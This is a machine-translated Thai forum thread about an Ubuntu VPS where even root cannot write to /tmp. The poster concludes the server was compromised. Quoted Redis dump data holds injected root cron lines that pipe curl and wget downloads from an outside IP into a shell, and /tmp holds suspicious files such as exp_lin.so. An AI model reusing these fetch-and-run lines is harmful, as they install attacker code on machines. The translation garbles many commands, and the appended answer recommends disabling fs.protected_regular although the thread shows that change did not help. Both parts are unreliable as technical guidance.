เหตุใดแม้แต่ผู้ใช้รูทของฉันไม่สามารถเขียนในไดเร็กทอรี /tmp ได้

ฉันไม่สามารถเขียนในไดเร็กทอรี /tmp

ในฐานะผู้ใช้ที่ไม่ใช่รูท:

europasprak@vps-xxxxxxxx:~$ echo 'ตกลง' > /tmp/dummy
-bash: /tmp/dummy: ไม่อนุญาตให้ดำเนินการ

และ

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo ที /tmp/dummy
ทีออฟ: /tmp/dummy: ไม่อนุญาตให้ดำเนินการ

เช่นเดียวกับผู้ใช้รูท:

root@vps-xxxxxxxx:~# echo 'ตกลง' > /tmp/dummy
bash: /tmp/dummy: ไม่อนุญาตให้ดำเนินการ

มันปฏิเสธก่อนที่จะ (!) ขอ ซูโด รหัสผ่าน:

เข้าระบบครั้งล่าสุด: พุธ 18 ส.ค. 19:38:33 น. 2021 จาก 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ตกลง' > /tmp/dummy2
-bash: /tmp/dummy2: ไม่อนุญาตให้ดำเนินการ

ที่น่าสนใจคือมันปฏิเสธที่จะตั้งเวลาในฐานะรูทในคำสั่งนี้:

root@vps-xxxxxxxx:/home/europasprak# แตะ /tmp/ok
สัมผัส: เวลาการตั้งค่าของ '/tmp/ok': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว

ประเด็นนี้ปรากฏขึ้นเมื่อเช้านี้

เครื่องคือ:

europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP อ. 13 ก.ค. 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

พาร์ติชัน:

europasprak@vps-xxxxxxxx:~$ df
ระบบไฟล์ 1K-blocks ใช้อยู่ ใช้% Mounted on
tmpfs 795424 1072 794352 1% /เรียกใช้
/dev/sda1 162420480 59362024 103042072 37% /
tmpfs 3977116 0 3977116 0% /dev/shm
tmpfs 5120 0 5120 0% /รัน/ล็อค
tmpfs 4096 0 4096 0% /sys/fs/cgroup
/dev/sda15 106858 8008 98851 8% /บูต/efi
โอเวอร์เลย์ 162420480 59362024 103042072 37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged

europasprak@vps-xxxxxxxx:~$ df -i
ระบบไฟล์ Inodes IUsed IFree IUse% Mounted on
tmpfs 994279 640 993639 1% /เรียกใช้
/dev/sda1 20643840 523620 20120220 3% /
tmpfs 994279 4 994275 1% /dev/shm
tmpfs 994279 3 994276 1% /รัน/ล็อค
tmpfs 1024 18 1006 2% /sys/fs/cgroup
/dev/sda15 0 0 0 - /boot/efi

ผลลัพธ์เพิ่มเติม:

europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 ราก ราก 4096 เมื่อ 18 05:45 /tmp

europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: การอนุญาตถูกปฏิเสธขณะอ่านแฟล็กบน /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: การอนุญาตถูกปฏิเสธขณะอ่านแฟล็กบน /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: การอนุญาตถูกปฏิเสธขณะอ่านแฟล็กบน /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: การอนุญาตถูกปฏิเสธขณะอ่านแฟล็กบน /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: สิทธิ์ถูกปฏิเสธขณะอ่านแฟล็กบน /tmp/snap.lxd

UPDATE: ฉันลองติดตั้งแล้ว บัญชี แต่ล้มเหลวอย่างเห็นได้ชัด:

europasprak@vps-xxxxxxxx:~$ sudo apt ติดตั้ง acl
กำลังอ่านรายการแพ็กเกจ... เกิดข้อผิดพลาด!
E: ไม่สามารถ mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: ไม่อนุญาตให้ดำเนินการ)
E: ไม่สามารถแยกวิเคราะห์หรือเปิดรายการแพ็คเกจหรือไฟล์สถานะได้
europasprak@vps-xxxxxxxx:~$ sudo apt update
ข้อผิดพลาด: 1 http://security.ubuntu.com/ubuntu
  ความล้มเหลวชั่วคราวในการแก้ไข 'security.ubuntu.com'
ข้อผิดพลาด: 2 https://download.docker.com/linux/ubuntu Groovy InRelease
  ความล้มเหลวชั่วคราวในการแก้ไข 'download.docker.com'
ข้อผิดพลาด: 3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
  การแก้ไข 'ppa.launchpad.net' ล้มเหลวชั่วคราว
ข้อผิดพลาด: 4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
  ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
ข้อผิดพลาด: 5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates In Release
  ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
ข้อผิดพลาด: 6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports In Release
  ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
กำลังอ่านรายการแพ็กเกจ... เกิดข้อผิดพลาด!
W: ไม่สามารถเรียก http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
W: ไม่สามารถเรียก http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
W: ไม่สามารถเรียก http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'nova.clouds.archive.ubuntu.com'
W: ไม่สามารถเรียก http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'security.ubuntu.com'
W: ไม่สามารถดึง https://download.docker.com/linux/ubuntu/dists/groovy/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'download.docker.com'
W: ไม่สามารถเรียก http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease ความล้มเหลวชั่วคราวในการแก้ไข 'ppa.launchpad.net'
W: ไฟล์ดัชนีบางไฟล์ดาวน์โหลดไม่สำเร็จ พวกเขาถูกละเลยหรือใช้ของเก่าแทน
E: ไม่สามารถ mkstemp /tmp/clearsigned.message.coHaS4 - GetTempFile (1: ไม่อนุญาตให้ดำเนินการ)
E: ไม่สามารถแยกวิเคราะห์หรือเปิดรายการแพ็คเกจหรือไฟล์สถานะได้

อัปเดต: ฉันได้ลองปิดการตั้งค่าแล้ว แต่ไม่ได้ผล:

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: ไม่อนุญาตให้ดำเนินการ
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0  
[sudo] รหัสผ่านสำหรับ europasprak: 
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: ไม่อนุญาตให้ดำเนินการ

VPS เป็นอินสแตนซ์ kvm:

europasprak@vps-xxxxxxxx:~$ sudo virt-อะไร
เควีเอ็ม

อัปเดต:

europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] รหัสผ่านสำหรับ europasprak: 
-- บันทึกเริ่มในวันพฤหัสบดีที่ 2021-04-01 18:46:32 UTC สิ้นสุดในวันอาทิตย์ 2021-08-22 13:54:48 UTC --
août 20 20:52:46 เคอร์เนล vps-3506b083: # 2
août 20 20:52:46 เคอร์เนล vps-3506b083: # 3
août 20 20:52:46 vps-3506b083 เคอร์เนล: acpi PNP0A03:00: ไม่สามารถเพิ่มข้อมูล MMCONFIG ไม่สามารถเข้าถึงพื้นที่การกำหนดค่า PCI แบบขยายภายใต้บริดจ์นี้
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: EISA: ไม่สามารถจัดสรรทรัพยากรสำหรับเมนบอร์ด
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 1
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 2
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 3
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 4
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 5
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 6
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับช่อง EISA 7
août 20 20:52:46 vps-3506b083 เคอร์เนล: แพลตฟอร์ม eisa.0: ไม่สามารถจัดสรรทรัพยากรสำหรับสล็อต EISA 8
août 20 20:52:46 vps-3506b083 เคอร์เนล: sd 2:0:0:0: เปิดเครื่องหรือรีเซ็ตอุปกรณ์
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: หน่วยกำหนดค่าให้ใช้ KillMode=none สิ่งนี้ไม่ปลอดภัยเนื่องจากปิดใช้งาน>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: หน่วยกำหนดค่าให้ใช้ KillMode=none สิ่งนี้ไม่ปลอดภัยเนื่องจากปิดการใช้งาน systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: ไม่สามารถตั้งค่า WakeOnLan ของ ens3 เป็นปิด: ไม่รองรับการทำงาน
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= ในส่วน [Link] และ UseMTU= ในส่วน [DHCP] >
août 20 20:52:50 vps-3506b083 cron[702]: ข้อผิดพลาด: นาทีที่ไม่ดี; ขณะอ่าน /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: ข้อผิดพลาด: นาทีที่ไม่ดี; ขณะอ่าน /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: ข้อผิดพลาด: นาทีที่ไม่ดี; ขณะอ่าน /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '3' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '3' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '3' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '3' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '4' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '4' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '4' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: ได้รับเพื่อนบ้านสำหรับลิงค์ '4' ที่เราไม่รู้ไม่สนใจ
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: ไม่สามารถรับลิงค์ config: ไม่มีอุปกรณ์ดังกล่าว
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: ไม่สามารถรับการกำหนดค่าลิงก์: ไม่มีอุปกรณ์ดังกล่าว
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: ไม่สามารถสร้าง MAC ถาวร: ไม่มีข้อมูล
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: ไม่สามารถสร้าง MAC ถาวร: ไม่มีข้อมูล
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: ไม่สามารถรอให้อินเทอร์เฟซเริ่มต้นได้: ไม่มีอุปกรณ์ดังกล่าว
europasprak@vps-3506b083:~$ 

อัปเดต: ฉันเห็นว่าไฟล์ /etc/crontab ของฉันได้รับการปรับอุณหภูมิแล้ว ระบบของฉันถูกแฮ็ก น่าแปลกที่ดูเหมือนจะไม่มีกิจกรรมการขุดเกิดขึ้นเลย ฉันคิดว่าฉันต้องติดตั้งระบบใหม่ทั้งหมด

REDIS0006þ^@^@^Gbackup3Ã@Q@X^G


*/4 *Â ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | ช

^@^Gbackup1@F


*/2 * * * * รูท cd1 -fsSL http://199.19.226.117/b2f628/b.sh | ช

^@^Gbackup4Ã@Q@X^G


*/5 *Â ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | ช

^@^Gbackup2@H


*/3 * * * * รูท wget -q -O- http://199.19.226.117/b2f628/b.sh | ช

ÿWìðr<90><93>^Gæ

นี่เป็นพฤติกรรมมาตรฐานใน Ubuntu 20.04+ เนื่องจากใหม่ fs.protected_regular พารามิเตอร์เคอร์เนล Linux คุณสามารถลองปิดใช้งานได้เช่นนี้

sudo sysctl fs.protected_regular=0  

และดูว่าคุณสามารถเขียนถึง /tmp ตอนนี้

หากคุณต้องการเปลี่ยนแปลง fs.protected_regular=0 อย่างถาวร ให้เพิ่มไปยังไฟล์ /usr/lib/sysctl.d/protect-links.conf